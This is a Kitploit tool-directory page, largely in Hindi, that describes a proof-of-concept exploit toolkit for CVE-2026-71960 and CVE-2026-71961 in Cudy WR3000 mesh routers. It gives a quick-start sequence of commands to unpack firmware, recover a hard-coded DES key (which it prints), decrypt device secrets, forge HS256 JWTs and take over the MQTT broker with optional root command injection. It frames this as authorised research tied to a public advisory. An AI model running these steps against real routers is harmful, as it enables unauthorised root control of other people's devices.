Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
the-same-key-opens-every-box-cve-2026-71960-hard-coded-jwt-secret-in-cudy-wr3000-mesh-mqtt — PoC टूलकिट जो राउटर फर्मवेयर को अनपैक करता है, डिवाइस सीक्रेट्स को डिक्रिप्ट करता है, JWT टोकन जाली बनाता है, और Cudy WR3000 मेश MQTT ब्रोकरों पर कब्ज़ा करने के लिए CVE-2026-71960/71961 का शोषण करता है। | Kitploit
उपकरण/GitHubGitHub/hunt-benito/the-same-key-opens-every-box-cve-2026-71960-hard-coded-jwt-secret-in-cudy-wr3000-mesh-mqtt
IoT सुरक्षाशोषणनेटवर्क सुरक्षाक्रिप्टोग्राफीपेनिट्रेशन टेस्टिंगप्रमाणीकरणफर्मवेयर विश्लेषण
GitHubhunt-benito/the-same-key-opens-every-box-cve-2026-71960-hard-coded-jwt-secret-in-cudy-wr3000-mesh-mqtt

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

the-same-key-opens-every-box-cve-2026-71960-hard-coded-jwt-secret-in-cudy-wr3000-mesh-mqtt

PoC टूलकिट जो राउटर फर्मवेयर को अनपैक करता है, डिवाइस सीक्रेट्स को डिक्रिप्ट करता है, JWT टोकन जाली बनाता है, और Cudy WR3000 मेश MQTT ब्रोकरों पर कब्ज़ा करने के लिए CVE-2026-71960/71961 का शोषण करता है।

रिपॉजिटरी देखें
11 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-71960 — Cudy WR3000 2.0 मेश MQTT ब्रोकर में हार्ड-कोडेड JWT सीक्रेट

Hunt-Benito लेख के लिए PoC टूलिंग "एक ही चाबी हर बॉक्स खोलती है: CVE-2026-71960 — Cudy के WR3000 मेश MQTT ब्रोकर में हार्ड-कोडेड JWT सीक्रेट" (https://www.hunt-benito.com/blog/the-same-key-opens-every-box-cve-2026-71960-hard-coded-jwt-secret-in-cudy-wr3000-mesh-mqtt/)

समान MQTT मेश इंटरफ़ेस के माध्यम से OS कमांड इंजेक्शन वाले CVE-2026-71961 के साथ जुड़कर, उस Cudy WR3000 2.0 मेश के हर नोड पर रूट कमांड निष्पादन तक पहुँचता है, जो 2.5.24 से पहले का फर्मवेयर चला रहा है।

यहाँ क्या है

फ़ाइलउद्देश्य
extract_firmware.pyएक सार्वजनिक Cudy sysupgrade .bin (hboot1tag + UBI) को पूर्ण OpenWrt फ़ाइलसिस्टम में अनपैक करें। 2.4.14 / 2.4.15 / 2.5.24 के साथ सत्यापित।
decrypt_bdinfo.pyDES कुंजी (DES_string_to_key("88T3j05dtFu8="), शून्य IV — libbdinfo.so से प्राप्त) व्युत्पन्न करें और अपने स्वयं के डिवाइस से bdinfo MTD डंप को डिक्रिप्ट करें, जिससे deviceid और पूरे बेड़े के secret का पता चलता है।
forge_jwt.pyएक HS256 टोकन बनाएं जो mosquitto_auth_unpwd_check में हर जाँच को संतुष्ट करता है (exp फ़्लोर 1577826000, deviceid युक्त username grant)। स्वयं-सत्यापित राउंड-ट्रिप करता है।
mqtt_takeover.pyजाली JWT के साथ TCP 1883 पर ब्रोकर से CONNECT करें, router/# की सदस्यता लें, और (वैकल्पिक रूप से, --cmd) CVE-2026-71961 के command.lua → io.popen सिंक का उपयोग करें।

त्वरित प्रारंभ

root@kitploit:~
pip install pycryptodome pyjwt paho-mqtt

# 1. unpack the public firmware (no device needed)
python3 extract_firmware.py WR3000V2-R116-2.4.15-20251030-114751-sysupgrade.bin --out rootfs --keep-sqfs

# 2. confirm the DES key literal ships in the image
strings -n 8 rootfs/usr/lib/libbdinfo.so | grep -E '^[A-Za-z0-9+/]{12}=$'
#   88T3j05dtFu8=

# 3. decrypt a bdinfo dump from YOUR OWN device (2.4.x exposes /dev/mtd*)
python3 decrypt_bdinfo.py bdinfo.bin

# 4. forge a token for the recovered deviceid/secret
python3 forge_jwt.py --deviceid 012345678901 --secret '<secret>'

# 5. passive: authenticate and listen on the mesh
python3 mqtt_takeover.py --host 192.168.10.1 --deviceid 012345678901 --secret '<secret>'

एक नज़र में निष्कर्ष

  • auth_plugin_jwt.so ब्रोकर स्टार्टअप पर bdinfo_get_value("deviceid") और bdinfo_get_value("secret") कॉल करता है; secret मान सभी मेश JWTs के लिए HS256 साइनिंग कुंजी है।

  • प्लगइन की exp जाँच exp >= 1577826000 (2019-12-31T21:00:00Z) है; time() कॉल के परिणाम की कभी तुलना नहीं की जाती — टोकन वास्तव में कभी समाप्त नहीं होते।

  • alg: none को अस्वीकार किया जाता है (कुंजी दिए जाने पर EINVAL) — सीक्रेट वास्तव में आवश्यक है; कोई alg-confusion शॉर्टकट नहीं है।

  • mosquitto_auth_acl_check() बिना किसी शर्त के SUCCESS लौटाता है — एक स्वीकृत CONNECT हर विषय पर पढ़ने/लिखने की अनुमति देता है।

  • प्लेनटेक्स्ट लिसनर 0.0.0.0:1883 (2.4.x) का अर्थ है कि कोई TLS क्लाइंट प्रमाणपत्र आवश्यक नहीं है। फिक्स्ड फर्मवेयर 2.5.24 1883 लिसनर को हटा देता है, bdinfo सीक्रेट को पूरी तरह से हटा देता है, और पारस्परिक TLS पर निर्भर करता है।

कानूनी

केवल अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए। केवल उन्हीं डिवाइसों पर चलाएँ जिनके आप स्वामी हैं या जिनके परीक्षण की आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं।

स्रोत

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-71960
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-71961
  • VulnCheck सलाह: https://www.vulncheck.com/advisories/cudy-wr3000-hard-coded-jwt-secret-authentication-bypass-via-mqtt
  • Cudy फर्मवेयर: https://www.cudy.com/en-us/pages/download-center/wr3000-2-0
टूल डाउनलोड करें